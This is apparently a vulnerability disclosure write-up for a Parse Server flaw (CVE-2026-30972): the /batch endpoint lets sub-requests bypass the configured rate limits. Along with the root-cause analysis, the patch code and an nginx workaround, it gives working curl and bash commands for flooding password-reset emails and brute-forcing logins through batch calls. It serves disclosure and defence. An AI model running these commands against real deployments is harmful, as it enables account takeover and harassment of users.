TL;DR — Parse Server — 21,000+ GitHub stars, 23,000+ weekly npm downloads — has a rate limiting bypass in the /batch endpoint. Rate limits are enforced at the Express middleware layer, but the batch handler routes sub-requests internally through the Promise router, completely skipping Express middleware. An attacker can stuff hundreds of requests to a rate-limited endpoint into a single batch call and every one goes through. If you're relying on Parse Server's built-in rate limiting to protect password reset, login, or any other sensitive endpoint — it doesn't work against someone who knows about /batch. Assigned CVE-2026-30972. Severity: Medium.

why this matters

Rate limiting exists for a reason. Brute-force login attempts, password reset abuse, OTP enumeration, credential stuffing — all of these attacks rely on making lots of requests fast. When you configure a rate limit of, say, 10 requests per minute on /requestPasswordReset, you expect the server to enforce that. Parse Server even has a dedicated rateLimit configuration option for exactly this use case, backed by express-rate-limit.

The problem is that the batch endpoint provides a parallel route into every API endpoint, and that parallel route was never wired through the rate limiting middleware. Every deployment relying on Parse Server's built-in rate limiting is affected.

the root cause: Express middleware vs. Promise router

Parse Server has two routing layers. There's the Express layer — the standard middleware stack where rate limiting, authentication, session handling, and other middleware run. And there's the Promise router — an internal routing system that maps method/path pairs to handler functions without going through Express.

When a normal request hits POST /parse/requestPasswordReset, it goes through the full Express middleware stack:

Client Request
  -> Express middleware stack
    -> handleRateLimit()      // <-- rate limit checked here
    -> handleParseHeaders()
    -> handleParseSession()
  -> Route handler
  -> Response

The rate limit middleware in middlewares.js runs express-rate-limit for every matching path:

const handleRateLimit = async (req, res, next) => {
  const rateLimits = req.config.rateLimits || [];
  try {
    await Promise.all(
      rateLimits.map(async limit => {
        const pathExp = limit.path.regexp || limit.path;
        if (pathExp.test(req.url)) {
          await limit.handler(req, res, err => {  // express-rate-limit handler
            if (err) {
              if (err.code === Parse.Error.CONNECTION_FAILED) {
                throw err;
              }
            }
          });
        }
      })
    );
  } catch (error) {
    res.status(429);
    res.json({ code: Parse.Error.CONNECTION_FAILED, error: error.message });
    return;
  }
  next();
};

But when a batch request hits POST /parse/batch, the batch handler processes each sub-request by calling router.tryRouteRequest() directly on the Promise router:

// The vulnerable handleBatch function (pre-patch)
function handleBatch(router, req) {
  if (!Array.isArray(req.body?.requests)) {
    throw new Parse.Error(Parse.Error.INVALID_JSON, 'requests must be an array');
  }

  const makeRoutablePath = makeBatchRoutingPathFunction(
    req.originalUrl, req.config.serverURL, req.config.publicServerURL
  );

  // No rate limit check here. Sub-requests go straight to the router.
  const batch = transactionRetries => {
    let initialPromise = Promise.resolve();
    if (req.body?.transaction === true) {
      initialPromise = req.config.database.createTransactionalSession();
    }
    return initialPromise.then(() => {
      const promises = req.body?.requests.map(restRequest => {
        const routablePath = makeRoutablePath(restRequest.path);
        const request = {
          body: restRequest.body,
          config: req.config,
          auth: req.auth,
          info: req.info,
        };
        // Direct call to Promise router -- bypasses Express middleware entirely
        return router.tryRouteRequest(restRequest.method, routablePath, request).then(
          response => { return { success: response.response }; },
          error => { return { error: { code: error.code, error: error.message } }; }
        );
      });
      return Promise.all(promises).then(results => {
        return { response: results };
      });
    });
  };
  return batch(5);
}

The key line is router.tryRouteRequest(). Here's what that method does in the Promise router:

tryRouteRequest(method, path, request) {
  var match = this.match(method, path);
  if (!match) {
    throw new Parse.Error(Parse.Error.INVALID_JSON, 'cannot route ' + method + ' ' + path);
  }
  request.params = match.params;
  return new Promise((resolve, reject) => {
    match.handler(request).then(resolve, reject);  // Direct handler call, no middleware
  });
}

It matches the route and calls the handler directly. No Express. No middleware. No rate limit. The batch endpoint is effectively a portal into every API endpoint that bypasses the entire middleware stack.

the exploit

Suppose you have a Parse Server with rate limiting configured on the password reset endpoint:

// Parse Server config
{
  rateLimit: [{
    requestPath: '/requestPasswordReset',
    requestTimeWindow: 60000,   // 1 minute window
    requestCount: 3,            // max 3 requests per minute
    errorResponseMessage: 'Too many password reset requests'
  }]
}

normal requests: rate limit works

Send four password reset requests individually and the fourth gets blocked:

# Requests 1-3: succeed
for i in 1 2 3; do
  curl -s -o /dev/null -w "%{http_code} " \
    -X POST "https://parse.example.com/parse/requestPasswordReset" \
    -H "X-Parse-Application-Id: APP_ID" \
    -H "X-Parse-REST-API-Key: REST_KEY" \
    -H "Content-Type: application/json" \
    -d '{"email":"victim@example.com"}'
done
# Output: 200 200 200

# Request 4: rate limited
curl -s -w "\n%{http_code}" \
  -X POST "https://parse.example.com/parse/requestPasswordReset" \
  -H "X-Parse-Application-Id: APP_ID" \
  -H "X-Parse-REST-API-Key: REST_KEY" \
  -H "Content-Type: application/json" \
  -d '{"email":"victim@example.com"}'
# Output: {"code":100,"error":"Too many password reset requests"}
# 429

Good. The rate limit works. For direct requests.

batch bypass: rate limit doesn't work

Now wrap 50 identical password reset requests into a single batch call:

# Generate 50 sub-requests in a single batch call
curl -s -X POST "https://parse.example.com/parse/batch" \
  -H "X-Parse-Application-Id: APP_ID" \
  -H "X-Parse-REST-API-Key: REST_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "requests": [
      {"method":"POST","path":"/parse/requestPasswordReset","body":{"email":"victim@example.com"}},
      {"method":"POST","path":"/parse/requestPasswordReset","body":{"email":"victim@example.com"}},
      {"method":"POST","path":"/parse/requestPasswordReset","body":{"email":"victim@example.com"}},
      ... (50 total)
    ]
  }'
# All 50 succeed. Zero rate limiting applied.

All 50 go through. The rate limit of 3 per minute is completely irrelevant. The batch endpoint processes each sub-request by calling tryRouteRequest() on the Promise router, which never passes through the Express middleware where handleRateLimit lives.

brute-force login via batch

The same bypass applies to any rate-limited endpoint. Here's a login brute-force:

# Brute-force login: many password attempts in a single HTTP request (5 shown)
curl -s -X POST "https://parse.example.com/parse/batch" \
  -H "X-Parse-Application-Id: APP_ID" \
  -H "X-Parse-REST-API-Key: REST_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "requests": [
      {"method":"POST","path":"/parse/login","body":{"username":"admin","password":"password1"}},
      {"method":"POST","path":"/parse/login","body":{"username":"admin","password":"password2"}},
      {"method":"POST","path":"/parse/login","body":{"username":"admin","password":"password3"}},
      {"method":"POST","path":"/parse/login","body":{"username":"admin","password":"letmein"}},
      {"method":"POST","path":"/parse/login","body":{"username":"admin","password":"admin123"}}
    ]
  }'

Each sub-request returns either a success (with session token) or an error (invalid credentials). The attacker can try hundreds of passwords per second with a single HTTP connection, completely bypassing whatever rate limit was configured on /login.

automating at scale

# Generate a batch payload with a password list
passwords=("password" "123456" "admin" "letmein" "welcome" "monkey" "dragon")
requests=""
for pw in "${passwords[@]}"; do
  requests+='{"method":"POST","path":"/parse/login","body":{"username":"admin","password":"'$pw'"}},'
done
requests="${requests%,}"  # trim trailing comma

curl -s -X POST "https://parse.example.com/parse/batch" \
  -H "X-Parse-Application-Id: APP_ID" \
  -H "X-Parse-REST-API-Key: REST_KEY" \
  -H "Content-Type: application/json" \
  -d "{\"requests\":[$requests]}" | jq '.[] | select(.success)'

If any password matches, the response includes the session token. One HTTP request, unlimited attempts.

impact

Any Parse Server deployment that relies on the built-in rateLimit configuration is affected. The batch endpoint bypasses rate limits on every path.

| Attack | Impact |
| --- | --- |
| Login brute-force | Unlimited password attempts via batch, bypassing login rate limits |
| Password reset abuse | Flood a victim with reset emails, bypassing /requestPasswordReset limits |
| OTP/verification enumeration | Enumerate verification codes at scale without hitting rate limits |
| DoS amplification | Multiply the impact of expensive operations by batching hundreds per request |

The severity is Medium (CVSS 5.3) because the vulnerability bypasses a security control but doesn't directly grant unauthorized access on its own. It's an enabler — it makes other attacks (brute-force, credential stuffing, DoS) feasible by removing the rate limit guardrail.

the fix

The patch adds a pre-flight check in the batch handler that counts how many sub-requests target each rate-limited path and rejects the entire batch if any path's count exceeds its requestCount:

// New code added to handleBatch (post-patch)
const rateLimits = req.config.rateLimits || [];
for (const limit of rateLimits) {
  // Skip if master key and includeMasterKey is not set
  if (req.auth?.isMaster && !limit.includeMasterKey) {
    continue;
  }
  // Skip for internal requests if includeInternalRequests is not set
  if (req.config.ip === '127.0.0.1' && !limit.includeInternalRequests) {
    continue;
  }
  const pathExp = limit.path.regexp || limit.path;
  let matchCount = 0;
  for (const restRequest of req.body.requests) {
    // Check method filter
    if (limit.requestMethods) {
      const method = restRequest.method?.toUpperCase();
      if (Array.isArray(limit.requestMethods)) {
        if (!limit.requestMethods.includes(method)) continue;
      } else {
        const regExp = new RegExp(limit.requestMethods);
        if (!regExp.test(method)) continue;
      }
    }
    const routablePath = makeRoutablePath(restRequest.path);
    if (pathExp.test(routablePath)) {
      matchCount++;
    }
  }
  if (matchCount > limit.requestCount) {
    throw new Parse.Error(
      Parse.Error.CONNECTION_FAILED,
      limit.errorResponseMessage || 'Batch request exceeds rate limit for endpoint'
    );
  }
}

An important caveat from the advisory: this is a server-level rate limit that only counts sub-requests within a single batch request. Requests already consumed in the current time window by previous individual or batch requests are not counted against the batch. So the effective limit may be higher when combining individual and batch requests. The advisory explicitly recommends using a reverse proxy or WAF for comprehensive rate limiting protection.

Patched versions: 8.6.23 and 9.5.2-alpha.10.

Workaround: use a reverse proxy or web application firewall (WAF) to enforce rate limiting before requests reach Parse Server. This is the more robust approach regardless of whether you patch, since the server-level fix only counts within a single batch.
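As a concrete sketch of that workaround, an nginx front end could enforce the same 3-per-minute budget before Parse Server ever sees the request. The upstream name and paths here are illustrative, not from the advisory:

```nginx
# Rate limit enforced at the proxy, keyed by client IP.
limit_req_zone $binary_remote_addr zone=pw_reset:10m rate=3r/m;

server {
    listen 443 ssl;

    location = /parse/requestPasswordReset {
        limit_req zone=pw_reset;
        proxy_pass http://parse_backend;
    }

    # Limit the batch endpoint too -- otherwise it remains a bypass.
    location = /parse/batch {
        limit_req zone=pw_reset;
        proxy_pass http://parse_backend;
    }
}
```

Note the trade-off: limiting /parse/batch this tightly throttles all batch traffic, not just password resets. Inspecting batch bodies per sub-request path requires a WAF or an application-layer check like the patch itself.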

the broader pattern

This is a classic instance of a pattern I keep running into: internal routing that bypasses the middleware stack. Any time a framework provides a "batch" or "multiplex" endpoint that re-routes sub-requests internally, every piece of middleware that normally runs on those endpoints needs to be explicitly re-applied. Rate limiting. Authentication. CSRF protection. Logging. If the batch handler skips the middleware layer, all of those controls vanish for batched requests.

Parse Server's architecture makes this especially clear. The Promise router was designed as an alternative to Express routing — the source code comment says it outright: "This is intended to replace the use of express.Router to handle subsections of the API surface." But Express middleware and Promise router handlers live in different worlds. When middleware is registered on the Express side, the Promise router has no awareness of it. Batch goes through the Promise router. Middleware stays on Express. The result is a gap that has existed since the rate limiting feature was introduced.

The lesson generalizes beyond Parse Server. GraphQL has the same pattern with query batching. Any API gateway that supports request multiplexing has the same risk. If your rate limiting is implemented at the transport layer (HTTP middleware) and your batch processing happens at the application layer (internal routing), the batch endpoint is a rate limit bypass by design. You have to either enforce limits at both layers or enforce them at the application layer where batch processing happens.

disclosure timeline

| Date | Event |
| --- | --- |
| Mar 8, 2026 | Vulnerability reported to parse-community via GitHub Security Advisory |
| Mar 8, 2026 | Fix PR #10147 submitted and merged |
| Mar 10, 2026 | CVE-2026-30972 assigned by GitHub |
| Mar 10, 2026 | Patched versions released (9.5.2-alpha.10, 8.6.23) |

This vulnerability was reported through responsible disclosure to the parse-community security team.